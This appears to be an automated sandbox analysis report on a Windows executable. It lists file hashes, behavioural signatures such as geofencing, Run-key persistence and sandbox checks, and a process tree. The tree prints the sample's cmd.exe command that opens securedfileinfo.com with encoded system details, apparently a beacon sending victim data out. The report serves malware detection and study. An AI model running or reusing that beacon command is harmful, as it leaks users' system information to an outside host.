Overview

overview

7

Static

static

4fefd8e44c...cb.exe

windows7-x64

3

4fefd8e44c...cb.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/11/2022, 07:31

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    4fefd8e44c20af75a9945d89c15ecf464bcd098743ab65b048da350b6baefccb.exe

  • Size

    143KB

  • MD5

    0ecf5c302e9e2359ecc93d1ad921fdfd

  • SHA1

    35775af59801eed2fd28af56a5e7c43f5fe57edb

  • SHA256

    4fefd8e44c20af75a9945d89c15ecf464bcd098743ab65b048da350b6baefccb

  • SHA512

    6e6bdc83c6d4d467c4e6bd828c9eae547b9b79f6439a6607178d06cca6ddc7611526818fd301e672327ae152340eaa517315dcb1acca75fea5a8216a026940a4

  • SSDEEP

    3072:iN6ZekwVJIlgps5q9Eb648qwlS/+TfQO45DmF:pe9IB83ID5SF

Score
7/10
persistence

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops file in System32 directory 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4fefd8e44c20af75a9945d89c15ecf464bcd098743ab65b048da350b6baefccb.exe
    "C:\Users\Admin\AppData\Local\Temp\4fefd8e44c20af75a9945d89c15ecf464bcd098743ab65b048da350b6baefccb.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1152
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "start http://securedfileinfo.com/404.jsp?chid=5301121^&rsn=plde^&details=^|v6.2.9200x64sp0.0ws^|tt31^|dt0^|dc100^|fs-2^|dh0^|ec13^|se12007^|dr4^|ds0^|rs0^|p1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2028
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://securedfileinfo.com/404.jsp?chid=5301121&rsn=plde&details=|v6.2.9200x64sp0.0ws|tt31|dt0|dc100|fs-2|dh0|ec13|se12007|dr4|ds0|rs0|p1
        3⤵
        • Adds Run key to start application
        • Enumerates system info in registry
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1568
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffd6dc046f8,0x7ffd6dc04708,0x7ffd6dc04718
          4⤵
            PID:3496
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2580,11261021712218650313,9116334671952435640,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2728 /prefetch:2
            4⤵
              PID:228
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2580,11261021712218650313,9116334671952435640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2920 /prefetch:3
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:100
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2580,11261021712218650313,9116334671952435640,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3176 /prefetch:8
              4⤵
                PID:4056
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2580,11261021712218650313,9116334671952435640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:1
                4⤵
                  PID:4132
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2580,11261021712218650313,9116334671952435640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3772 /prefetch:1
                  4⤵
                    PID:4612
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2580,11261021712218650313,9116334671952435640,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5264 /prefetch:8
                    4⤵
                      PID:1492
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2580,11261021712218650313,9116334671952435640,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5492 /prefetch:8
                      4⤵
                        PID:4884
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2580,11261021712218650313,9116334671952435640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1
                        4⤵
                          PID:3740
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2580,11261021712218650313,9116334671952435640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1
                          4⤵
                            PID:1936
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2580,11261021712218650313,9116334671952435640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
                            4⤵
                              PID:4280
                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2580,11261021712218650313,9116334671952435640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6808 /prefetch:8
                              4⤵
                                PID:2948
                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                4⤵
                                • Drops file in Program Files directory
                                PID:1400
                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff73dff5460,0x7ff73dff5470,0x7ff73dff5480
                                  5⤵
                                    PID:856
                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2580,11261021712218650313,9116334671952435640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6808 /prefetch:8
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4880
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2580,11261021712218650313,9116334671952435640,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1316 /prefetch:8
                                  4⤵
                                    PID:1408
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k netsvcs -p
                              1⤵
                              • Drops file in System32 directory
                              • Checks processor information in registry
                              • Enumerates system info in registry
                              PID:1456
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:612

                              Network

                                    MITRE ATT&CK Enterprise v6

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
                                      Filesize

                                      1KB

                                      MD5

                                      167cfd90cb81d3dddd63f107249a0f2e

                                      SHA1

                                      39a78631cc336bb71fe7a02eeb91474bbc335eea

                                      SHA256

                                      4c527164ea0096494cfd68b9e9167c0587c162106e8ec71edc705963c9fc543b

                                      SHA512

                                      013a16d1dc963bf536a156ccb6ea94596887e1d774d6b18636000bbda06b57c135bac00ef046d18022b8512d6abb9bffd3c26b6d10998b4f0e86b46c319b7911

                                      Download Submit

                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4
                                      Filesize

                                      472B

                                      MD5

                                      9f6cc8d3fe9092a6d3901e873a87fd87

                                      SHA1

                                      2e0aac117a4cc57596efb3d6f6624c269f94b031

                                      SHA256

                                      e73982e62b92abac3d15b161f4525448cc2bc8b9bacefdcbfc6f87b74ec372e4

                                      SHA512

                                      9736a099967d7ad595439768e45c633ff7d34de92f7cb0c19cd3d4590c4a6dd4fedfcd1b5617c81652e61f4ffe919057507f622f4c6d8d626cfc40234ad2c757

                                      Download Submit

                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
                                      Filesize

                                      724B

                                      MD5

                                      f569e1d183b84e8078dc456192127536

                                      SHA1

                                      30c537463eed902925300dd07a87d820a713753f

                                      SHA256

                                      287bc80237497eb8681dbf136a56cc3870dd5bd12d48051525a280ae62aab413

                                      SHA512

                                      49553b65a8e3fc0bf98c1bc02bae5b22188618d8edf8e88e4e25932105796956ae8301c63c487e0afe368ea39a4a2af07935a808f5fb53287ef9287bc73e1012

                                      Download Submit

                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
                                      Filesize

                                      410B

                                      MD5

                                      11a38e5cc29aa16f2a4c86e5919ca8dd

                                      SHA1

                                      d90ffde7fcd50a7026028afb6b3bddb53afc37e2

                                      SHA256

                                      95e3eaf6e6bd0dc2fdb2539eaacf30342ec5441531ef046889c6e6fdf2006af2

                                      SHA512

                                      fb4e66f7254fd056755e99dd357427f9de6e710f9fa14cb000774061c830bdc1d9b67a34d0bb3d58cd681645b28406811cd4bf9f7df9e2d447e0d6b3c70ab7d4

                                      Download Submit

                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4
                                      Filesize

                                      402B

                                      MD5

                                      86785ecaad61b6bf4faf9dadcc49f60e

                                      SHA1

                                      b442c6d87bfe2acdbbc15b8c2d3b8bba494379aa

                                      SHA256

                                      99afede6d70f8ea309164c88956ede8a20d82ae63ad3be87d16efcd4ea45c936

                                      SHA512

                                      20e897c85b06aa7c91b6a4b5a2f478733ab36a66bd363212e33b16bdd08d4de6adb7c41fb4d5fe4b2bdb9d6dca521ec9de34e16d35274b410742e766ea974030

                                      Download Submit

                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
                                      Filesize

                                      392B

                                      MD5

                                      4deaf5bb51e96d52b72f3e6302b215fe

                                      SHA1

                                      6468dc900e21ecfd10980cb4864d6e253e0587b5

                                      SHA256

                                      4eb91208a80a36915aa6dc8edb4e324a07efb048444c44f443d8c4ec923a2153

                                      SHA512

                                      856d0f2d98a37b7aa820834438ba8a37eba4c431556dd202f66fa34d04235ab8d80648342f8e8c98ddf6894ea9e2e39cfd2a0d6318d71e20057cdc04588c9588

                                      Download Submit